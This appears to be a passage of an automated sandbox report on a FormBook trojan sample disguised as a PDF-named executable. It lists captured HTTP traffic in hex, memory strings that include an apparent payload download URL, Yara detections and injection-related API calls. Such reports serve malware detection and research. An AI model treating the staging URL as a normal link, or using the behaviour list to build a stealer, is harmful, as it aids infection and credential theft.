6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:32:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:34:28 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:35:07 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:35:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: BM-FM_NR.24040718PDF.exe, BM-FM_NR.24040718PDF.exe, 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmp, BM-FM_NR.24040718PDF.exe, 00000000.00000000.12883213848.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: BM-FM_NR.24040718PDF.exe, 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmp, BM-FM_NR.24040718PDF.exe, 00000000.00000000.12883213848.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000626000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13534857876.00000000068FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://absorbante-calitate.ro/
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13534857876.00000000068FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://absorbante-calitate.ro/0H
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13640013314.0000000006A50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://absorbante-calitate.ro/calitateX/lUMnxNJflRDqoVSbz65.bin
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13640013314.0000000006A50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://absorbante-calitate.ro/calitateX/lUMnxNJflRDqoVSbz65.binCredscroabsorbante-calitate.ro/calit
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: unknown Network traffic detected: HTTP traffic on port 50244 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50244
Source: unknown HTTPS traffic detected: 37.251.143.215:443 -> 192.168.11.20:50244 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405086

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B234E0 NtCreateMutant,LdrInitializeThunk, 2_2_36B234E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22D10 NtQuerySystemInformation,LdrInitializeThunk, 2_2_36B22D10
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22B90 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_36B22B90
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B23C90 NtOpenThread, 2_2_36B23C90
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B23C30 NtOpenProcessToken, 2_2_36B23C30
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B238D0 NtGetContextThread, 2_2_36B238D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B24570 NtSuspendThread, 2_2_36B24570
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B24260 NtSetContextThread, 2_2_36B24260
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22EB0 NtProtectVirtualMemory, 2_2_36B22EB0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22E80 NtCreateProcessEx, 2_2_36B22E80
